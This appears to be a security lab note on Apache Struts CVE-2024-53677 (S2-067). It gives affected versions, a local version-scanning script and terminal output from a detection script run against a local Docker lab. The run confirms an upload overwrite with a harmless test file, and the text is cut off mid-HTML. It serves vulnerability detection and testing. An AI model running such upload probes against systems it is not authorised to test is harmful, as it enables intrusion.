Struts - CVE-2024-53677 / S2-067
The file upload logic in Apache Struts is flawed. An attacker can manipulate file upload parameters to enable path traversal, and under some circumstances this can lead to uploading a malicious file that can be used to perform remote code execution.
Vulnerable versions:
Struts 2.0.0 - Struts 2.3.37 (End-of-Life),
Struts 2.5.0 - Struts 2.5.33, and
Struts 6.0.0 - Struts 6.3.0.2
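To triage hosts against the version ranges listed above without sending any request, the following added example (not part of the original page or of the linked check script) walks a deployment directory and flags Struts core jars whose version falls inside a listed range. The function names and the `struts2-core-<version>.jar` file naming are assumptions; the sample layout in the demo branch is constructed.

```python
import re
import sys
import tempfile
from pathlib import Path

# Affected ranges exactly as listed above (inclusive on both ends).
AFFECTED = [
    ((2, 0, 0), (2, 3, 37)),
    ((2, 5, 0), (2, 5, 33)),
    ((6, 0, 0), (6, 3, 0, 2)),
]

# Assumption: usual Maven artifact name; a qualifier such as -SNAPSHOT is ignored.
JAR_RE = re.compile(r"^struts2-core-(\d+(?:\.\d+)*)(?:[-.].*)?\.jar$")


def _key(parts, width=4):
    parts = tuple(parts)  # pad so that 6.3.0 compares as 6.3.0.0
    return parts + (0,) * (width - len(parts))


def is_affected(version):
    """True if a dotted version string falls inside one of the listed ranges."""
    v = _key(int(p) for p in version.split("."))
    return any(_key(lo) <= v <= _key(hi) for lo, hi in AFFECTED)


def scan(root):
    """Return (jar path, version, affected) for each struts2-core jar under root."""
    findings = []
    for jar in sorted(Path(root).rglob("struts2-core-*.jar")):
        m = JAR_RE.match(jar.name)
        if m:
            findings.append((str(jar), m.group(1), is_affected(m.group(1))))
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan(sys.argv[1])
    else:  # no path given: run against a constructed sample layout
        tmp = tempfile.mkdtemp()
        lib = Path(tmp, "ROOT", "WEB-INF", "lib")
        lib.mkdir(parents=True)
        for name in ("struts2-core-6.3.0.1.jar", "struts2-core-6.4.0.jar"):
            (lib / name).touch()
        results = scan(tmp)
    for path, version, affected in results:
        print("AFFECTED" if affected else "ok", version, path)
```

A match only says the library version is inside a listed range; whether an upload action is actually exposed still has to be confirmed on the application itself.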
Check script from: https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK
» curl http://127.0.0.1:8081/vuln_test.txt
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>
» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.
» curl http://127.0.0.1:8081/vuln_test.txt
CVE-2024-53677 / S2-067 detection test.
» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan 7 11:23 .
drwxr-xr-x 1 root root 4096 Jan 7 11:18 ..
drwxr-x--- 2 root root 4096 Jan 7 11:14 forbidden
-rw-r----- 1 root root 226 Jan 7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan 7 11:14 META-INF
-rw-r----- 1 root root 39 Jan 7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan 7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt
CVE-2024-53677 / S2-067 detection test.
» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
»
» curl http://127.0.0.1:8081/upload.action
<html>
<head>
<title>File upload</title>
</head>
<body>
<h1>Apache Struts 6.3.0.1</h1>
<p